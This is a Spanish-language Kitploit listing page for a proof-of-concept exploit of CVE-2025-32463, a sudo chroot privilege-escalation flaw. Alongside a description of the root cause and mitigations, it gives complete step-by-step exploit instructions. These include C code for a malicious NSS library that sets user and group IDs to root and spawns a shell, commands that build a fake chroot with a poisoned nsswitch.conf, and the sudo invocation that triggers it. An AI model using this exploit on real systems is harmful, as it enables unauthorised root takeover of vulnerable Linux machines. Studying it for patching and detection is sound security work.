Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-32463-EXPLOIT — Un exploit PoC para CVE-2025-32463 - Escalada de privilegios en Sudo | Kitploit
Herramientas/GitHubGitHub/k3ystr0k3r/cve-2025-32463-exploit
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónShellcodePruebas de PenetraciónAprendizaje y EducaciónDesarrollo de PayloadsExplotación de Binarios
GitHubk3ystr0k3r/cve-2025-32463-exploit

CVE-2025-32463-EXPLOIT

Un exploit PoC para CVE-2025-32463 - Escalada de privilegios en Sudo

Ver Repositorio
924hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-32463 - Escalada de privilegios en Sudo

Existe una vulnerabilidad de escalada de privilegios en sudo que afecta a sistemas basados en Linux/Unix. El fallo surge debido a una validación incorrecta de rutas cuando sudo se utiliza con la opción -R (--chroot), lo que permite a los atacantes escalar a root mediante la carga maliciosa de bibliotecas NSS.

Causa raíz

  • Cuando sudo ejecuta un comando dentro de un entorno chroot (opción -R), gestiona incorrectamente la carga de bibliotecas NSS (Name Service Switch) durante condiciones de error.
  • Una validación incorrecta de rutas (por ejemplo, no depurar LD_LIBRARY_PATH o las rutas en /etc/nsswitch.conf) puede provocar la carga de una biblioteca maliciosa en lugar de la biblioteca NSS legítima (por ejemplo, libnss_files.so).
  • Esto resulta en ejecución arbitraria de código con privilegios de root.

Impacto

  • Los atacantes con acceso local pueden explotar esto para obtener privilegios de root.

Mitigación

  1. Actualice sudo a la última versión parcheada.
  2. Restrinja los permisos de sudo (limite el uso de chroot cuando sea posible).
  3. Audite las variables de entorno:
    • Restrinja LD_LIBRARY_PATH.
    • Asegure /etc/nsswitch.conf.
  4. Aplique secure_path en /etc/sudoers para limitar las rutas de búsqueda de bibliotecas.

Detalles técnicos

ComponenteDisparador de la vulnerabilidad
sudo -RValidación incorrecta de la ruta chroot.
NSSCarga insegura de bibliotecas durante errores.
ExploitSecuestro de ruta → Carga de biblioteca maliciosa.

Resumen de la vulnerabilidad

ID CVE: CVE-2025-32463
Versiones afectadas: Sudo 1.9.14 hasta 1.9.17
Puntuación CVSS: 9.8 (Crítica)
Impacto: Escalada local de privilegios a root

Flujo del ataque

  1. El atacante crea una biblioteca NSS maliciosa
  2. Configura un entorno chroot falso
  3. Provoca una condición de error en sudo
  4. Sudo carga la biblioteca controlada por el atacante
  5. El código malicioso se ejecuta con privilegios de root

Pasos del exploit

Paso 1: Verificar la vulnerabilidad

Si responde con No such file or directory, entonces es vulnerable: sudo -R invalid invalid sudo: invalid: No such file or directory

Paso 2: Crear un espacio de trabajo temporal

Primero, creamos un directorio temporal para trabajar: TMP_DIR=$(mktemp -d -t sudobridge.XXXXXX) cd $TMP_DIR Esto crea un directorio temporal con nombre único y navega dentro de él. El comando mktemp asegura que no interfieramos con los archivos existentes del sistema.

Paso 3: Crear la biblioteca maliciosa

Necesitamos crear un archivo C (bridge90.c) que se compilará como una biblioteca maliciosa:

root@kitploit:~
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void bridge(void) {
  setreuid(0,0);  // Establece el ID de usuario real y efectivo a root
  setregid(0,0);  // Establece el ID de grupo real y efectivo a root
  chdir("/");     // Cambia al directorio raíz
  execl("/bin/sh", "sh", "-c", "/bin/bash", NULL);  // Ejecuta un shell
}

Componentes clave:

root@kitploit:~
__attribute__((constructor)) asegura que la función se ejecute cuando se carga la biblioteca

setreuid y setregid escalan privilegios a root

execl genera un shell bash

Paso 4: Configurar el entorno del exploit

mkdir -p bridge/etc echo "passwd: /bridge90" > bridge/etc/nsswitch.conf cp /etc/group bridge/etc/ mkdir libnss_ gcc -shared -fPIC -Wl,-init,bridge -o libnss_/bridge90.so.2 bridge90.c Desglose:

root@kitploit:~
Crear un entorno chroot falso en bridge/etc

Modificar nsswitch.conf para que apunte a nuestra ruta maliciosa

Copiar el archivo real /etc/group para mantener la legitimidad

Crear un directorio para nuestra biblioteca maliciosa

Compilar el código C en una biblioteca compartida con un nombre que coincida con las convenciones de NSS (Name Service Switch)

Paso 5: Ejecutar el exploit

sudo -R bridge bridge

Este comando intenta usar nuestro entorno manipulado:

root@kitploit:~
El primer bridge es el directorio chroot que contiene nuestra configuración maliciosa

El segundo bridge es el comando a ejecutar (que cargará nuestra biblioteca)

Paso 6: Verificar la escalada de privilegios

Después de una explotación exitosa, verifique el acceso root:

whoami # Debería devolver "root" id -u # Debería devolver "0" (UID de root)

root@kitploit:~
graph LR
    A[Malicious Library] --> B[Fake Chroot]
    B --> C[Trigger Error]
    C --> D[Library Load]
    D --> E[Root Execution]

Aviso legal

¡Este exploit PoC es solo con fines educativos! ¡No soy responsable de ningún uso indebido que puedas hacer con este exploit!

Descargar herramienta